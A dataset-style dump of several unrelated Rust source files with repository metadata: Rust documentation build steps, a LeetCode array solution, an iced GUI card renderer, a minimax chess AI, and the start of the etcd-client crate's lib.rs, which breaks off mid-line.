run.builder; run.path("src/tools/cargo/src/doc/book").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(CargoBook { target: run.target, name: INTERNER.intern_str("cargo"), }); } fn run(self, builder: &Builder<'_>) { let target = self.target; let name = self.name; let src = builder.src.join("src/tools/cargo/src/doc"); let out = builder.doc_out(target); t!(fs::create_dir_all(&out)); let out = out.join(name); builder.info(&format!("Cargo Book ({}) - {}", target, name)); let _ = fs::remove_dir_all(&out); builder.run(builder.tool_cmd(Tool::Rustbook) .arg("build") .arg(&src) .arg("-d") .arg(out)); } } 
#[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] struct RustbookSrc { target: Interned<String>, name: Interned<String>, src: Interned<PathBuf>, } impl Step for RustbookSrc { type Output = (); fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { run.never() } /// Invoke `rustbook` for `target` for the doc book `name` from the `src` path. /// /// This will not actually generate any documentation if the documentation has /// already been generated. fn run(self, builder: &Builder<'_>) { let target = self.target; let name = self.name; let src = self.src; let out = builder.doc_out(target); t!(fs::create_dir_all(&out)); let out = out.join(name); let src = src.join(name); let index = out.join("index.html"); let rustbook = builder.tool_exe(Tool::Rustbook); let mut rustbook_cmd = builder.tool_cmd(Tool::Rustbook); if up_to_date(&src, &index) && up_to_date(&rustbook, &index) { return } builder.info(&format!("Rustbook ({}) - {}", target, name)); let _ = fs::remove_dir_all(&out); builder.run(rustbook_cmd .arg("build") .arg(&src) .arg("-d") .arg(out)); } } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct TheBook { compiler: Compiler, target: Interned<String>, name: &'static str, } impl Step for TheBook { type Output = (); const DEFAULT: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.path("src/doc/book").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(TheBook { compiler: run.builder.compiler(run.builder.top_stage, run.builder.config.build), target: run.target, name: "book", }); } /// Builds the book and associated stuff. /// /// We need to build: /// /// * Book (first edition) /// * Book (second edition) /// * Version info and CSS /// * Index page /// * Redirect pages fn run(self, builder: &Builder<'_>) { let compiler = self.compiler; let target = self.target; let name = self.name; // build book builder.ensure(RustbookSrc { target, name: INTERNER.intern_string(name.to_string()), src: doc_src(builder), }); // building older edition redirects let source_name = format!("{}/first-edition", name); builder.ensure(RustbookSrc { target, name: INTERNER.intern_string(source_name), src: doc_src(builder), }); let source_name = format!("{}/second-edition", name); builder.ensure(RustbookSrc { target, name: INTERNER.intern_string(source_name), src: doc_src(builder), }); let source_name = format!("{}/2018-edition", name); builder.ensure(RustbookSrc { target, name: INTERNER.intern_string(source_name), src: doc_src(builder), }); // build the version info page and CSS builder.ensure(Standalone { compiler, target, }); // build the redirect pages builder.info(&format!("Documenting book redirect pages ({})", target)); for file in t!(fs::read_dir(builder.src.join("src/doc/book/redirects"))) { let file = t!(file); let path = file.path(); let path = path.to_str().unwrap(); invoke_rustdoc(builder, compiler, target, path); } } } fn invoke_rustdoc( builder: &Builder<'_>, compiler: Compiler, target: Interned<String>, markdown: &str, ) { let out = builder.doc_out(target); let path = builder.src.join("src/doc").join(markdown); let header = builder.src.join("src/doc/redirect.inc"); let footer = builder.src.join("src/doc/footer.inc"); let version_info = out.join("version_info.html"); let mut cmd = builder.rustdoc_cmd(compiler); let out = out.join("book"); cmd.arg("--html-after-content").arg(&footer) .arg("--html-before-content").arg(&version_info) .arg("--html-in-header").arg(&header) .arg("--markdown-no-toc") 
.arg("--markdown-playground-url").arg("https://play.rust-lang.org/") .arg("-o").arg(&out).arg(&path) .arg("--markdown-css").arg("../rust.css"); builder.run(&mut cmd); } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct Standalone { compiler: Compiler, target: Interned<String>, } impl Step for Standalone { type Output = (); const DEFAULT: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.path("src/doc").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(Standalone { compiler: run.builder.compiler(run.builder.top_stage, run.builder.config.build), target: run.target, }); } /// Generates all standalone documentation as compiled by the rustdoc in `stage` /// for the `target` into `out`. /// /// This will list all of `src/doc` looking for markdown files and appropriately /// perform transformations like substituting `VERSION`, `SHORT_HASH`, and /// `STAMP` along with providing the various header/footer HTML we've customized. /// /// In the end, this is just a glorified wrapper around rustdoc! fn run(self, builder: &Builder<'_>) { let target = self.target; let compiler = self.compiler; builder.info(&format!("Documenting standalone ({})", target)); let out = builder.doc_out(target); t!(fs::create_dir_all(&out)); let favicon = builder.src.join("src/doc/favicon.inc"); let footer = builder.src.join("src/doc/footer.inc"); let full_toc = builder.src.join("src/doc/full-toc.inc"); t!(fs::copy(builder.src.join("src/doc/rust.css"), out.join("rust.css"))); let version_input = builder.src.join("src/doc/version_info.html.template"); let version_info = out.join("version_info.html"); if !builder.config.dry_run && !up_to_date(&version_input, &version_info) { let info = t!(fs::read_to_string(&version_input)) .replace("VERSION", &builder.rust_release()) .replace("SHORT_HASH", builder.rust_info.sha_short().unwrap_or("")) .replace("STAMP", builder.rust_info.sha().unwrap_or("")); t!(fs::write(&version_info, &info)); } for file in t!(fs::read_dir(builder.src.join("src/doc"))) { let file = t!(file); let path = file.path(); let filename = path.file_name().unwrap().to_str().unwrap(); if !filename.ends_with(".md") || filename == "README.md" { continue } let html = out.join(filename).with_extension("html"); let rustdoc = builder.rustdoc(compiler); if up_to_date(&path, &html) && up_to_date(&footer, &html) && up_to_date(&favicon, &html) && up_to_date(&full_toc, &html) && (builder.config.dry_run || up_to_date(&version_info, &html)) && (builder.config.dry_run || up_to_date(&rustdoc, &html)) { continue } let mut cmd = builder.rustdoc_cmd(compiler); cmd.arg("--html-after-content").arg(&footer) .arg("--html-before-content").arg(&version_info) .arg("--html-in-header").arg(&favicon) .arg("--markdown-no-toc") .arg("--index-page").arg(&builder.src.join("src/doc/index.md")) .arg("--markdown-playground-url").arg("https://play.rust-lang.org/") .arg("-o").arg(&out) .arg(&path); if filename == "not_found.md" { cmd.arg("--markdown-css") .arg("https://doc.rust-lang.org/rust.css"); } else { cmd.arg("--markdown-css").arg("rust.css"); } builder.run(&mut cmd); } } } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct Std { pub stage: u32, pub target: Interned<String>, } impl Step for Std { type Output = (); const DEFAULT: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.all_krates("test").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(Std { 
stage: run.builder.top_stage, target: run.target }); } /// Compile all standard library documentation. /// /// This will generate all documentation for the standard library and its /// dependencies. This is largely just a wrapper around `cargo doc`. fn run(self, builder: &Builder<'_>) { let stage = self.stage; let target = self.target; builder.info(&format!("Documenting stage{} std ({})", stage, target)); let out = builder.doc_out(target); t!(fs::create_dir_all(&out)); let compiler = builder.compiler_for(stage, builder.config.build, target); builder.ensure(compile::Std { compiler, target }); let out_dir = builder.stage_out(compiler, Mode::Std) .join(target).join("doc"); // Here what we're doing is creating a *symlink* (directory junction on // Windows) to the final output location. This is not done as an // optimization but rather for correctness. We've got three trees of // documentation, one for std, one for test, and one for rustc. It's then // our job to merge them all together. // // Unfortunately rustbuild doesn't know nearly as well how to merge doc // trees as rustdoc does itself, so instead of actually having three // separate trees we just have rustdoc output to the same location across // all of them. // // This way rustdoc generates output directly into the output, and rustdoc // will also directly handle merging. let my_out = builder.crate_doc_out(target); t!(symlink_dir_force(&builder.config, &my_out, &out_dir)); t!(fs::copy(builder.src.join("src/doc/rust.css"), out.join("rust.css"))); let run_cargo_rustdoc_for = |package: &str| { let mut cargo = builder.cargo(compiler, Mode::Std, target, "rustdoc"); compile::std_cargo(builder, &compiler, target, &mut cargo); // Keep a whitelist so we do not build internal stdlib crates, these will be // build by the rustc step later if enabled. cargo.arg("-Z").arg("unstable-options") .arg("-p").arg(package); // Create all crate output directories first to make sure rustdoc uses // relative links. // FIXME: Cargo should probably do this itself. t!(fs::create_dir_all(out_dir.join(package))); cargo.arg("--") .arg("--markdown-css").arg("rust.css") .arg("--markdown-no-toc") .arg("--generate-redirect-pages") .arg("--resource-suffix").arg(crate::channel::CFG_RELEASE_NUM) .arg("--index-page").arg(&builder.src.join("src/doc/index.md")); builder.run(&mut cargo.into()); }; for krate in &["alloc", "core", "std", "proc_macro", "test"] { run_cargo_rustdoc_for(krate); } builder.cp_r(&my_out, &out); } } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct Rustc { stage: u32, target: Interned<String>, } impl Step for Rustc { type Output = (); const DEFAULT: bool = true; const ONLY_HOSTS: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.krate("rustc-main").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(Rustc { stage: run.builder.top_stage, target: run.target, }); } /// Generates compiler documentation. /// /// This will generate all documentation for compiler and dependencies. /// Compiler documentation is distributed separately, so we make sure /// we do not merge it with the other documentation from std, test and /// proc_macros. This is largely just a wrapper around `cargo doc`. fn run(self, builder: &Builder<'_>) { let stage = self.stage; let target = self.target; builder.info(&format!("Documenting stage{} compiler ({})", stage, target)); // This is the intended out directory for compiler documentation. 
let out = builder.compiler_doc_out(target); t!(fs::create_dir_all(&out)); // Get the correct compiler for this stage. let compiler = builder.compiler_for(stage, builder.config.build, target); if !builder.config.compiler_docs { builder.info("\tskipping - compiler/librustdoc docs disabled"); return; } // Build rustc. builder.ensure(compile::Rustc { compiler, target }); // We do not symlink to the same shared folder that already contains std library // documentation from previous steps as we do not want to include that. let out_dir = builder.stage_out(compiler, Mode::Rustc).join(target).join("doc"); t!(symlink_dir_force(&builder.config, &out, &out_dir)); // Build cargo command. let mut cargo = builder.cargo(compiler, Mode::Rustc, target, "doc"); cargo.env("RUSTDOCFLAGS", "--document-private-items --passes strip-hidden"); compile::rustc_cargo(builder, &mut cargo); // Only include compiler crates, no dependencies of those, such as `libc`. cargo.arg("--no-deps"); // Find dependencies for top level crates. let mut compiler_crates = HashSet::new(); for root_crate in &["rustc_driver", "rustc_codegen_llvm", "rustc_codegen_ssa"] { let interned_root_crate = INTERNER.intern_str(root_crate); find_compiler_crates(builder, &interned_root_crate, &mut compiler_crates); } for krate in &compiler_crates { // Create all crate output directories first to make sure rustdoc uses // relative links. // FIXME: Cargo should probably do this itself. t!(fs::create_dir_all(out_dir.join(krate))); cargo.arg("-p").arg(krate); } builder.run(&mut cargo.into()); } } fn find_compiler_crates( builder: &Builder<'_>, name: &Interned<String>, crates: &mut HashSet<Interned<String>> ) { // Add current crate. crates.insert(*name); // Look for dependencies. for dep in builder.crates.get(name).unwrap().deps.iter() { if builder.crates.get(dep).unwrap().is_local(builder) { find_compiler_crates(builder, dep, crates); } } } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct Rustdoc { stage: u32, target: Interned<String>, } impl Step for Rustdoc { type Output = (); const DEFAULT: bool = true; const ONLY_HOSTS: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { run.krate("rustdoc-tool") } fn make_run(run: RunConfig<'_>) { run.builder.ensure(Rustdoc { stage: run.builder.top_stage, target: run.target, }); } /// Generates compiler documentation. /// /// This will generate all documentation for compiler and dependencies. /// Compiler documentation is distributed separately, so we make sure /// we do not merge it with the other documentation from std, test and /// proc_macros. This is largely just a wrapper around `cargo doc`. fn run(self, builder: &Builder<'_>) { let stage = self.stage; let target = self.target; builder.info(&format!("Documenting stage{} rustdoc ({})", stage, target)); // This is the intended out directory for compiler documentation. let out = builder.compiler_doc_out(target); t!(fs::create_dir_all(&out)); // Get the correct compiler for this stage. let compiler = builder.compiler_for(stage, builder.config.build, target); if !builder.config.compiler_docs { builder.info("\tskipping - compiler/librustdoc docs disabled"); return; } // Build rustc docs so that we generate relative links. builder.ensure(Rustc { stage, target }); // Build rustdoc. builder.ensure(tool::Rustdoc { compiler: compiler }); // Symlink compiler docs to the output directory of rustdoc documentation. 
let out_dir = builder.stage_out(compiler, Mode::ToolRustc) .join(target) .join("doc"); t!(fs::create_dir_all(&out_dir)); t!(symlink_dir_force(&builder.config, &out, &out_dir)); // Build cargo command. let mut cargo = prepare_tool_cargo( builder, compiler, Mode::ToolRustc, target, "doc", "src/tools/rustdoc", SourceType::InTree, &[] ); // Only include compiler crates, no dependencies of those, such as `libc`. cargo.arg("--no-deps"); cargo.arg("-p").arg("rustdoc"); cargo.env("RUSTDOCFLAGS", "--document-private-items"); builder.run(&mut cargo.into()); } } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct ErrorIndex { target: Interned<String>, } impl Step for ErrorIndex { type Output = (); const DEFAULT: bool = true; const ONLY_HOSTS: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.path("src/tools/error_index_generator").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(ErrorIndex { target: run.target, }); } /// Generates the HTML rendered error-index by running the /// `error_index_generator` tool. fn run(self, builder: &Builder<'_>) { let target = self.target; builder.info(&format!("Documenting error index ({})", target)); let out = builder.doc_out(target); t!(fs::create_dir_all(&out)); let compiler = builder.compiler(2, builder.config.build); let mut index = tool::ErrorIndex::command( builder, compiler, ); index.arg("html"); index.arg(out.join("error-index.html")); index.arg(crate::channel::CFG_RELEASE_NUM); // FIXME: shouldn't have to pass this env var index.env("CFG_BUILD", &builder.config.build); builder.run(&mut index); } } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct UnstableBookGen { target: Interned<String>, } impl Step for UnstableBookGen { type Output = (); const DEFAULT: bool = true; const ONLY_HOSTS: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.path("src/tools/unstable-book-gen").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(UnstableBookGen { target: run.target, }); } fn run(self, builder: &Builder<'_>) { let target = self.target; builder.info(&format!("Generating unstable book md files ({})", target)); let out = builder.md_doc_out(target).join("unstable-book"); builder.create_dir(&out); builder.remove_dir(&out); let mut cmd = builder.tool_cmd(Tool::UnstableBookGen); cmd.arg(builder.src.join("src")); cmd.arg(out); builder.run(&mut cmd); } } fn symlink_dir_force(config: &Config, src: &Path, dst: &Path) -> io::Result<()> { if config.dry_run { return Ok(()); } if let Ok(m) = fs::symlink_metadata(dst) { if m.file_type().is_dir() { fs::remove_dir_all(dst)?; } else { // handle directory junctions on windows by falling back to // `remove_dir`. fs::remove_file(dst).or_else(|_| { fs::remove_dir(dst) })?; } } symlink_dir(config, src, dst) }
true
5d2f73cf25fa341765e065d0c679edf9d897efcc
Rust
aptend/leetcode-rua
/Rust/src/n0945_minimum_increment_to_make_array_unique.rs
UTF-8
518
2.96875
3
[]
no_license
pub fn min_increment_for_unique(a: Vec<i32>) -> i32 {
    let mut A = a;
    A.sort_unstable();
    let mut n = -1i32;
    let mut ans = 0i32;
    for &x in A.iter() {
        if n < x {
            n = x;
        } else {
            ans += n - x + 1;
            n += 1;
        }
    }
    ans
}

#[test]
fn test_945() {
    assert_eq!(1, min_increment_for_unique(vec![1, 2, 2]));
    assert_eq!(2, min_increment_for_unique(vec![0, 0, 2, 2]));
    assert_eq!(6, min_increment_for_unique(vec![3, 2, 1, 2, 1, 7]));
}
true
9e13fc897a49106118c298a8624ad5095f102b30
Rust
0x192/iced_aw
/src/graphics/card.rs
UTF-8
8,253
2.828125
3
[ "MIT" ]
permissive
//! Displays a [`Card`](Card). //! //! *This API requires the following crate features to be activated: card* use iced_graphics::{ backend, defaults, Backend, Color, Defaults, HorizontalAlignment, Point, Primitive, Rectangle, Renderer, VerticalAlignment, }; use iced_native::{mouse, Element, Layout}; pub use crate::style::card::{Style, StyleSheet}; use crate::{core::renderer::DrawEnvironment, native::card}; /// A card consisting of a head, body and optional foot. /// /// This is an alias of an `iced_native` Card with an `iced_wgpu::Renderer`. pub type Card<'a, Message, Backend> = card::Card<'a, Message, Renderer<Backend>>; impl<B> card::Renderer for Renderer<B> where B: Backend + backend::Text, { type Style = Box<dyn StyleSheet>; const DEFAULT_PADDING: f32 = 10.0; fn default_size(&self) -> f32 { f32::from(self.backend().default_size()) } fn draw<Message>( &mut self, env: DrawEnvironment<'_, Self::Defaults, Self::Style, ()>, head: &iced_native::Element<'_, Message, Self>, body: &iced_native::Element<'_, Message, Self>, foot: &Option<iced_native::Element<'_, Message, Self>>, ) -> Self::Output { let bounds = env.layout.bounds(); let mut children = env.layout.children(); let style = env.style_sheet.active(); let mouse_interaction = mouse::Interaction::default(); let background = Primitive::Quad { bounds, background: style.background, border_radius: style.border_radius, border_width: style.border_width, border_color: style.border_color, }; let border = Primitive::Quad { bounds, background: Color::TRANSPARENT.into(), border_radius: style.border_radius, border_width: style.border_width, border_color: style.border_color, }; // ----------- Head ---------------------- let head_layout = children .next() .expect("Graphics: Layout should have a head layout"); let (head, head_mouse_interaction) = draw_head( self, head, head_layout, env.cursor_position, env.viewport.expect("A viewport should exist for Card"), &style, ); // ----------- Body ---------------------- let body_layout = children .next() .expect("Graphics: Layout should have a body layout"); let (body, body_mouse_interaction) = draw_body( self, body, body_layout, env.cursor_position, env.viewport.expect("A viewport should exist for Card"), &style, ); // ----------- Foot ---------------------- let foot_layout = children .next() .expect("Graphics: Layout should have a foot layout"); let (foot, foot_mouse_interaction) = draw_foot( self, foot, foot_layout, env.cursor_position, env.viewport.expect("A viewport should exist for Card"), &style, ); ( Primitive::Group { primitives: vec![background, border, head, body, foot], }, mouse_interaction .max(head_mouse_interaction) .max(body_mouse_interaction) .max(foot_mouse_interaction), ) } } /// Draws the head of the card. 
fn draw_head<Message, B>( renderer: &mut Renderer<B>, head: &Element<'_, Message, Renderer<B>>, layout: Layout<'_>, cursor_position: Point, viewport: &Rectangle, style: &Style, ) -> (Primitive, mouse::Interaction) where B: Backend + backend::Text, { let mut head_children = layout.children(); let head_background = Primitive::Quad { bounds: layout.bounds(), background: style.head_background, border_radius: style.border_radius, border_width: 0.0, border_color: Color::TRANSPARENT, }; let (head, head_mouse_interaction) = head.draw( renderer, &Defaults { text: defaults::Text { color: style.head_text_color, }, }, head_children .next() .expect("Graphics: Layout should have a head content layout"), cursor_position, viewport, ); let (close, close_mouse_interaction) = head_children.next().map_or( (Primitive::None, mouse::Interaction::default()), |close_layout| { let close_bounds = close_layout.bounds(); let is_mouse_over_close = close_bounds.contains(cursor_position); ( Primitive::Text { content: super::icons::Icon::X.into(), font: super::icons::ICON_FONT, size: close_layout.bounds().height + if is_mouse_over_close { 5.0 } else { 0.0 }, bounds: Rectangle { x: close_bounds.center_x(), y: close_bounds.center_y(), ..close_bounds }, color: style.close_color, horizontal_alignment: HorizontalAlignment::Center, vertical_alignment: VerticalAlignment::Center, }, if is_mouse_over_close { mouse::Interaction::Pointer } else { mouse::Interaction::default() }, ) }, ); ( Primitive::Group { primitives: vec![head_background, head, close], }, head_mouse_interaction.max(close_mouse_interaction), ) } /// Draws the body of the card. fn draw_body<Message, B>( renderer: &mut Renderer<B>, body: &Element<'_, Message, Renderer<B>>, layout: Layout<'_>, cursor_position: Point, viewport: &Rectangle, style: &Style, ) -> (Primitive, mouse::Interaction) where B: Backend + backend::Text, { let mut body_children = layout.children(); let body_background = Primitive::Quad { bounds: layout.bounds(), background: style.body_background, border_radius: 0.0, border_width: 0.0, border_color: Color::TRANSPARENT, }; let (body, mouse_interaction) = body.draw( renderer, &Defaults { text: defaults::Text { color: style.body_text_color, }, }, body_children .next() .expect("Graphics: Layout should have a body content layout"), cursor_position, viewport, ); ( Primitive::Group { primitives: vec![body_background, body], }, mouse_interaction, ) } /// Draws the foot of the card. fn draw_foot<Message, B>( renderer: &mut Renderer<B>, foot: &Option<Element<'_, Message, Renderer<B>>>, layout: Layout<'_>, cursor_position: Point, viewport: &Rectangle, style: &Style, ) -> (Primitive, mouse::Interaction) where B: Backend + backend::Text, { let mut foot_children = layout.children(); let foot_background = Primitive::Quad { bounds: layout.bounds(), background: style.foot_background, border_radius: style.border_radius, border_width: 0.0, border_color: Color::TRANSPARENT, }; let (foot, foot_mouse_interaction) = foot.as_ref().map_or_else( || (Primitive::None, mouse::Interaction::default()), |foot| { foot.draw( renderer, &Defaults { text: defaults::Text { color: style.foot_text_color, }, }, foot_children .next() .expect("Graphics: Layout should have a foot content layout"), cursor_position, viewport, ) }, ); ( Primitive::Group { primitives: vec![foot_background, foot], }, foot_mouse_interaction, ) }
true
216b647ea72657a8aaef254ad0c0e3d3e2fd25a1
Rust
Sam-Gebhardt/ChessGame
/src/AI/min_max.rs
UTF-8
4,054
3.1875
3
[]
no_license
/* Chess AI that is built upon min/max with alpha pruning https://www.chessprogramming.org/Minimax https://www.chessprogramming.org/Alpha-Beta https://vitcapstoneproject.wordpress.com/2018/02/26/evaluating-a-board-position/ */ use crate::board::Board; use crate::pieces::piece_type; use crate::pieces::sign_checker; use crate::pieces::Moves; use crate::AI::eval; use crate::AI::random::print_move; // takes a move_set vec and adds the src to each move // in order to allow min/max to work fn add_source(src: [i8; 2], move_set: Vec<[i8; 2]>) -> Vec<[[i8; 2]; 2]> { let mut fixed: Vec<[[i8; 2]; 2]> = Vec::new(); for i in 0..move_set.len() { fixed.push([src, move_set[i]]); } return fixed; } // Generate all the moves for the pieces speciefed by color fn generate_all_moves(board: &Board, color: i8) -> Vec<[[i8; 2]; 2]> { let mut piece: Box<dyn Moves>; let mut moves: Vec<[[i8; 2]; 2]> = Vec::new(); let mut key: i8; for i in 0..8 { for j in 0..8 { key = board.get_piece(i, j); if sign_checker(key, color) { piece = piece_type(key, [i, j]); moves.append(&mut add_source([i, j], piece.move_set(board))); } } } return moves; } /* board: The current version of the board to maximize best: best possible move prev: The previous move from the last iteration of the min/max alpha: Number to max beta: number to min depth: Number of times to run */ fn max(board: Board, mut best: &mut [[i8; 2]; 2], mut prev: &mut [[i8; 2]; 2], mut alpha: i32, beta: i32, depth: i32) -> i32 { if depth == 0 { return eval::eval_board(&board, 1); } let mut score: i32; let mut board_copy: Board; let moves: Vec<[[i8; 2]; 2]> = generate_all_moves(&board, -1); for i in 0..moves.len() { board_copy = board.clone(); board_copy.move_piece(moves[i][0], moves[i][1]); score = min(board_copy, &mut best, &mut prev, alpha, beta, depth - 1); if score >= beta { return beta; } if score > alpha { // if depth is 3 (first iteration) save value // otherwise set the best move to the previous move if depth == 3 { *prev = moves[i]; } else if depth == 1 { *best = *prev; } alpha = score; } } return alpha; } /* board: The current version of the board to maximize best: best possible move prev: The previous move from the last iteration of the min/max alpha: Number to max beta: number to min depth: Number of times to run */ fn min(board: Board, mut best: &mut [[i8; 2]; 2], mut prev: &mut [[i8; 2]; 2], alpha: i32, mut beta: i32, depth: i32) -> i32 { if depth == 0 { return eval::eval_board(&board, -1); } let mut score: i32; let mut board_copy: Board; let moves: Vec<[[i8; 2]; 2]> = generate_all_moves(&board, 1); for i in 0..moves.len() { board_copy = board.clone(); board_copy.move_piece(moves[i][0], moves[i][1]); score = max(board_copy, &mut best, &mut prev, alpha, beta, depth - 1); if score <= alpha { return alpha; } if score < beta { beta = score; } } return beta; } pub fn select(board: &mut Board) { let board_copy: Board = board.clone(); // the best move will be the first element in the vector let mut best_move: [[i8; 2]; 2] = [[0, 0], [0, 0]]; let mut prev: [[i8; 2]; 2] = [[0, 0], [0, 0]]; // Run with a depth of 3 as default let _score: i32 = max(board_copy, &mut best_move, &mut prev, -9999999, 9999999, 3); // println!("{:?}", list_best); board.move_piece(best_move[0], best_move[1]); print_move(best_move); } /* Todo: Copying the board each time has a lot of over head, Can make general improvements: * See if the move puts the player in check */
true
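The header comments above describe plain minimax with alpha-beta cut-offs. Here is a self-contained sketch of that algorithm on a toy game tree, independent of the chess Board and move generation used in the crate:

// Toy game tree: an inner node owns its children, a leaf owns a static evaluation.
enum Node {
    Leaf(i32),
    Branch(Vec<Node>),
}

fn alphabeta(node: &Node, mut alpha: i32, mut beta: i32, maximizing: bool) -> i32 {
    match node {
        Node::Leaf(score) => *score,
        Node::Branch(children) => {
            if maximizing {
                let mut best = i32::MIN;
                for child in children {
                    best = best.max(alphabeta(child, alpha, beta, false));
                    alpha = alpha.max(best);
                    if alpha >= beta {
                        break; // beta cut-off: the minimizer will never allow this line
                    }
                }
                best
            } else {
                let mut best = i32::MAX;
                for child in children {
                    best = best.min(alphabeta(child, alpha, beta, true));
                    beta = beta.min(best);
                    if alpha >= beta {
                        break; // alpha cut-off
                    }
                }
                best
            }
        }
    }
}

fn main() {
    use Node::*;
    // Classic textbook tree with minimax value 3; the second subtree is pruned
    // after its first leaf (2) because the maximizer already has 3 available.
    let tree = Branch(vec![
        Branch(vec![Leaf(3), Leaf(5)]),
        Branch(vec![Leaf(2), Leaf(9)]),
    ]);
    assert_eq!(alphabeta(&tree, i32::MIN, i32::MAX, true), 3);
}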
2a1152836773d6b0b14d9bc8def3416744badbaa
Rust
abalmos/etcd-client
/src/lib.rs
UTF-8
6,792
2.5625
3
[ "MIT" ]
permissive
//! An [etcd](https://github.com/etcd-io/etcd) v3 API client for Rust. //! It provides asynchronous client backed by [tokio](https://github.com/tokio-rs/tokio) and [tonic](https://github.com/hyperium/tonic). //! //! # Supported APIs //! //! - KV //! - Watch //! - Lease //! - Auth //! - Maintenance //! - Cluster //! - Lock //! - Election //! //! # Usage //! //! Add this to your `Cargo.toml`: //! //! ```toml //! [dependencies] //! etcd-client = "0.7" //! tokio = { version = "1.0", features = ["full"] } //! ``` //! //! To get started using `etcd-client`: //! //! ```Rust //! use etcd_client::{Client, Error}; //! //! #[tokio::main] //! async fn main() -> Result<(), Error> { //! let mut client = Client::connect(["localhost:2379"], None).await?; //! // put kv //! client.put("foo", "bar", None).await?; //! // get kv //! let resp = client.get("foo", None).await?; //! if let Some(kv) = resp.kvs().first() { //! println!("Get kv: {{{}: {}}}", kv.key_str()?, kv.value_str()?); //! } //! //! Ok(()) //! } //! ``` //! //! # Examples //! //! Examples can be found in [`etcd-client/examples`](https://github.com/etcdv3/etcd-client/tree/master/examples). //! //! # Feature Flags //! //! - `tls`: Enables the `rustls`-based TLS connection. Not //! enabled by default. //! - `tls-roots`: Adds system trust roots to `rustls`-based TLS connection using the //! `rustls-native-certs` crate. Not enabled by default. //! - `pub-response-field`: Exposes structs used to create regular `etcd-client` responses //! including internal protobuf representations. Useful for mocking. Not enabled by default. #![cfg_attr(docsrs, feature(doc_cfg))] mod auth; mod client; mod error; mod rpc; pub use crate::client::{Client, ConnectOptions}; pub use crate::error::Error; pub use crate::rpc::auth::{ AuthClient, AuthDisableResponse, AuthEnableResponse, Permission, PermissionType, RoleAddResponse, RoleDeleteResponse, RoleGetResponse, RoleGrantPermissionResponse, RoleListResponse, RoleRevokePermissionOptions, RoleRevokePermissionResponse, UserAddOptions, UserAddResponse, UserChangePasswordResponse, UserDeleteResponse, UserGetResponse, UserGrantRoleResponse, UserListResponse, UserRevokeRoleResponse, }; pub use crate::rpc::cluster::{ ClusterClient, Member, MemberAddOptions, MemberAddResponse, MemberListResponse, MemberPromoteResponse, MemberRemoveResponse, MemberUpdateResponse, }; pub use crate::rpc::election::{ CampaignResponse, ElectionClient, LeaderKey, LeaderResponse, ObserveStream, ProclaimOptions, ProclaimResponse, ResignOptions, ResignResponse, }; pub use crate::rpc::kv::{ CompactionOptions, CompactionResponse, Compare, CompareOp, DeleteOptions, DeleteResponse, GetOptions, GetResponse, KvClient, PutOptions, PutResponse, SortOrder, SortTarget, Txn, TxnOp, TxnOpResponse, TxnResponse, }; pub use crate::rpc::lease::{ LeaseClient, LeaseGrantOptions, LeaseGrantResponse, LeaseKeepAliveResponse, LeaseKeepAliveStream, LeaseKeeper, LeaseLeasesResponse, LeaseRevokeResponse, LeaseStatus, LeaseTimeToLiveOptions, LeaseTimeToLiveResponse, }; pub use crate::rpc::lock::{LockClient, LockOptions, LockResponse, UnlockResponse}; pub use crate::rpc::maintenance::{ AlarmAction, AlarmMember, AlarmOptions, AlarmResponse, AlarmType, DefragmentResponse, HashKvResponse, HashResponse, MaintenanceClient, MoveLeaderResponse, SnapshotResponse, SnapshotStreaming, StatusResponse, }; pub use crate::rpc::watch::{ Event, EventType, WatchClient, WatchFilterType, WatchOptions, WatchResponse, WatchStream, Watcher, }; pub use crate::rpc::{KeyValue, ResponseHeader}; #[cfg(feature = 
"tls")] #[cfg_attr(docsrs, doc(cfg(feature = "tls")))] pub use tonic::transport::{Certificate, ClientTlsConfig as TlsOptions, Identity}; /// Exposes internal protobuf representations used to create regular public response types. #[cfg(feature = "pub-response-field")] #[cfg_attr(docsrs, doc(cfg(feature = "pub-response-field")))] pub mod proto { pub use crate::rpc::pb::etcdserverpb::AlarmMember as PbAlarmMember; pub use crate::rpc::pb::etcdserverpb::{ AlarmResponse as PbAlarmResponse, AuthDisableResponse as PbAuthDisableResponse, AuthEnableResponse as PbAuthEnableResponse, AuthRoleAddResponse as PbAuthRoleAddResponse, AuthRoleDeleteResponse as PbAuthRoleDeleteResponse, AuthRoleGetResponse as PbAuthRoleGetResponse, AuthRoleGrantPermissionResponse as PbAuthRoleGrantPermissionResponse, AuthRoleListResponse as PbAuthRoleListResponse, AuthRoleRevokePermissionResponse as PbAuthRoleRevokePermissionResponse, AuthUserAddResponse as PbAuthUserAddResponse, AuthUserChangePasswordResponse as PbAuthUserChangePasswordResponse, AuthUserDeleteResponse as PbAuthUserDeleteResponse, AuthUserGetResponse as PbAuthUserGetResponse, AuthUserGrantRoleResponse as PbAuthUserGrantRoleResponse, AuthUserListResponse as PbAuthUserListResponse, AuthUserRevokeRoleResponse as 